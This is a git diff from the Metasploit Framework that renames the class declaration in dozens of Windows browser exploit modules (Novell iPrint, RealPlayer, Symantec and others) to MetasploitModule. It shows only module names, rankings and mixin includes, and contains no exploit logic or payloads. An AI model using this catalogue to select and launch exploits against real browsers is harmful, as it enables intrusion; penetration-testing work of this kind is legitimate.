Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index cb409f5da7..d766b0638d 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 72a855ab3c..09200f72af 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb index bbed4c4ee0..55980c503d 100644 --- a/modules/exploits/windows/browser/ms13_055_canchor.rb +++ b/modules/exploits/windows/browser/ms13_055_canchor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 80881a1894..fc2563ea71 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index aaf14954b6..6178bc76a8 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index dd3327be64..6ee1ddd0da 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index 99aa91da65..136025b1a0 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 8129288d3f..5b709aacba 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index b28f0dc273..5b2f00c98e 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb 
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 99cd39a738..a539f7c1f8 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
 require 'msf/core/exploit/powershell'
-class Metasploit4 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::BrowserExploitServer
diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
index 70582071df..8a2c327422 100644
--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -22,7 +22,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb
index 6acfe799f4..09b8351635 100644
--- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb
+++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index 040ee2fa16..dac7e039f8 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb
index 5202ae760e..52f37d6fd8 100644
--- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb
+++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb
index d137afaaea..35671acecc 100644
--- a/modules/exploits/windows/browser/nis2004_antispam.rb
+++ b/modules/exploits/windows/browser/nis2004_antispam.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb
index 292b1c9539..fb3fd45964 100644
--- a/modules/exploits/windows/browser/nis2004_get.rb
+++ b/modules/exploits/windows/browser/nis2004_get.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
index d6e76ffe2d..011b5f84d5 100644
--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index 2c5c4424cf..a61d88ca68 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
index 28b4f9ef75..042abf46a7 100644
--- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb
+++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
@@ -34,7 +34,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb
index d247e134c7..fb669b078b 100644
--- a/modules/exploits/windows/browser/novelliprint_datetime.rb
+++ b/modules/exploits/windows/browser/novelliprint_datetime.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb
index 6ec5f52b65..8cfc00ade1 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
index cc6954458c..20a29ec374 100644
--- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
@@ -34,7 +34,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
index fd55d572ea..c784347f9d 100644
--- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
index 70db241a7c..6badf5ec16 100644
--- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb
index 4461b2a70e..34573d0248 100644
--- a/modules/exploits/windows/browser/novelliprint_target_frame.rb
+++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index 846f4befde..611029ad99 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index 9c195aa332..e943b11db0 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
index 694e4d6431..f4cccba075 100644
--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
index 51961e8099..a369d42b06 100644
--- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
+++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
index f80e83d451..9335d80815 100644
--- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
+++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb
index 5295485415..5ecae278aa 100644
--- a/modules/exploits/windows/browser/orbit_connecting.rb
+++ b/modules/exploits/windows/browser/orbit_connecting.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb
index 34d945a5d1..7184ac812a 100644
--- a/modules/exploits/windows/browser/ovftool_format_string.rb
+++ b/modules/exploits/windows/browser/ovftool_format_string.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index c5c57b34c1..d4018ccb1e 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb
index a74f4bcff9..3d508ab03b 100644
--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index d260b5ba37..af452faef1 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
index c2afc67f27..f24cab863b 100644
--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
index 75f94ecd5b..049dfae49f 100644
--- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb
+++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb
index 33fedfc9c6..5e8066f7bb 100644
--- a/modules/exploits/windows/browser/realplayer_console.rb
+++ b/modules/exploits/windows/browser/realplayer_console.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb
index 0aab25f860..8af7086610 100644
--- a/modules/exploits/windows/browser/realplayer_import.rb
+++ b/modules/exploits/windows/browser/realplayer_import.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb
index 9a14d5500a..5b81c4d16d 100644
--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb
index 7c0cc98bb6..2523e574e7 100644
--- a/modules/exploits/windows/browser/realplayer_smil.rb
+++ b/modules/exploits/windows/browser/realplayer_smil.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb
index af12347a60..262b0480b4 100644
--- a/modules/exploits/windows/browser/roxio_cineplayer.rb
+++ b/modules/exploits/windows/browser/roxio_cineplayer.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb
index d6fe45cc71..2397e4d9f4 100644
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
index 74706eabcb..057ff83b3c 100644
--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
index 3fee969510..b53b4c019d 100644
--- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
+++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
index 33f43e125b..73ca64f4bd 100644
--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb
index b234fe3cdb..7649666ea1 100644
--- a/modules/exploits/windows/browser/softartisans_getdrivename.rb
+++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb
index 826b8ebc90..6244740d46 100644
--- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb
+++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
index de69777a84..f35dcf5e4e 100644
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
index bdad1cf0ff..b76478f196 100644
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
index 034b2bb5a2..75d5bcdeb2 100644
--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
index aa83462d25..eb84ff49fe 100644
--- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
+++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb
index 040559c4ba..6ab6a8ac97 100644
--- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb
+++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
index e3471a628f..f950ccbaac 100644
--- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
+++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
index 0d0a45ad76..90f780c73f 100644
--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index d699f52c02..4540017403 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
index c784f2aace..4544396f52 100644
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
index 8d3c754bbf..27990a4b47 100644
--- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb
+++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
@@ -33,7 +33,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
